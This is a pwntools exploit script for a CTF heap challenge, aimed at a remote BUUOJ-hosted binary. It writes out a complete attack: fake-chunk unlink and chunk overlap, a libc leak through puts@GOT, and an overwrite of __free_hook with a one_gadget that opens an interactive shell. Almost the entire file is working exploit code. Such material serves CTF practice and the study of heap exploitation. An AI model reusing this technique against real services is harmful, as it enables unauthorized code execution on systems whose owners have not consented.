unlink && chunkoverlapping
#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *
# Constants carried over by the author.  None of them is referenced by the
# functions below; presumably addresses inside ./pwn from an earlier attempt
# (unverified).
heap = 0x6020E0
hlen = 0x602060
key1 = 0x6022BC
key2 = 0x6022B8

# pwntools setup: tmux split for gdb, amd64/linux target, verbose I/O logging.
context.terminal = ['tmux', 'splitw', '-h']
context.update(arch='amd64', os='linux', log_level='debug')

# Remote challenge endpoint; the commented lines are the local alternatives.
# p = process('./pwn')
p = remote('node3.buuoj.cn', 26285)
elf = ELF('./pwn')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('libc6_2.27-3ubuntu1_amd64.so')
def debug(p, cmd):
    """Attach gdb to the tube `p` running the gdb script `cmd`, then block.

    `pause()` waits for the user before the exploit continues, so the
    breakpoints in `cmd` can be set up first.  Shadows the module-level `p`.
    """
    gdb.attach(p, cmd)
    pause()
def add(idx, size, payload):
    """Menu option 1: create entry `idx` of `size` bytes filled with `payload`.

    The index and size are sent as lines; `payload` is sent raw, so the caller
    controls whether a trailing newline is included.
    """
    answers = (
        ('4.show\n', '1'),
        ('index:', str(idx)),
        ('size:', str(size)),
    )
    for prompt, answer in answers:
        p.sendlineafter(prompt, answer)
    p.sendafter('content:', payload)
def delete(idx):
    """Menu option 2: delete entry `idx`."""
    for prompt, answer in (('4.show\n', '2'), ('index:', str(idx))):
        p.sendlineafter(prompt, answer)
def edit(idx, payload):
    """Menu option 3: overwrite entry `idx` with `payload`.

    `payload` is sent raw (no newline appended), exactly as given.
    """
    for prompt, answer in (('4.show\n', '3'), ('index:', str(idx))):
        p.sendlineafter(prompt, answer)
    p.sendafter('content:', payload)
def show(idx):
    """Menu option 4: ask the service to print entry `idx`.

    Nothing is read back here; the caller consumes the output from `p`.
    """
    for prompt, answer in (('4.show\n', '4'), ('index:', str(idx))):
        p.sendlineafter(prompt, answer)
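def LEAK():
    """Drive the remote service through the author's leak/overwrite sequence.

    Uses the module-level tube `p`, `elf` and `libc` and the menu helpers
    add/delete/edit/show.  Returns nothing; it ends in `p.interactive()`.

    Fix: every payload is built from explicit byte literals.  The original
    mixed `p64()` output with text literals (`.ljust(0xf0, '\\x00')`,
    `+ '\\n'`), which only works on Python 2; on Python 3 pwntools `p64`
    returns bytes and those expressions raise TypeError.  `b'...'` literals
    behave identically on Python 2.
    """
    # NOTE(review): 0x6021e0 and the `og` offset are fixed for this exact
    # binary/libc build; presumably 0x6021e0 is a static address in ./pwn
    # and `og` a libc-relative gadget offset — the commented-out alternatives
    # suggest several candidates were tried.  Confirm both before reuse.
    target = 0x6021e0

    # leak libc && unlink
    for i in range(7):
        add(i + 1, 0xf8, b'mech0n\n')
    add(8, 0xf8, b'mech0n\n')
    add(32, 0xf8, b'mech0n\n')  # 0x6021e0
    add(9, 0xf8, b'mehc0n\n')
    add(10, 0xf8, b'mech0n\n')
    # debug(p, 'b *0x400990\n') # add() -> nop

    # Fake chunk header written into entry 32: prev_size 0, size 0xf1,
    # fd/bk = target-0x18 / target-0x10, zero-padded to 0xf0 bytes, then a
    # trailing prev_size of 0xf0.
    payload = p64(0) + p64(0xf1) + p64(target - 3 * 8) + p64(target - 2 * 8)
    payload = payload.ljust(0xf0, b'\x00')
    payload += p64(0xf0)
    # debug(p, 'b *0x400B73\n') # edit() -> nop
    edit(32, payload)

    for i in range(7):
        delete(i + 1)
    # debug(p, 'b *0x400A61\n') # delete() -> nop
    delete(9)

    # Three copies of puts@GOT followed by `target`, zero-padded to 0xf0
    # bytes, then the qword 0x0000000a00000001.
    payload = p64(elf.got['puts']) * 3 + p64(target)
    payload = payload.ljust(0xf0, b'\x00')
    payload += p64(0x0000000a00000001)
    # debug(p, 'b *0x400B73\n') # edit() -> nop
    edit(32, payload)

    show(29)
    # The leaked pointer is the last six bytes up to and including 0x7f.
    puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
    libc.address = puts_addr - libc.sym['puts']
    success('PUTS: ' + hex(puts_addr))
    success('LIBC: ' + hex(libc.address))

    # og = 0x4f365
    og = 0x4f322  # 0x4f3c2
    # og = 0x10a45c
    payload = p64(libc.sym['__free_hook']) + b'\n'
    edit(32, payload)
    payload = p64(og + libc.address)
    # debug(p, 'b *0x400B73\n') # edit() -> nop
    edit(32, payload)
    delete(10)
    p.interactive()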
if __name__ == '__main__':
    # Entry point: the whole interaction lives in LEAK().
    LEAK()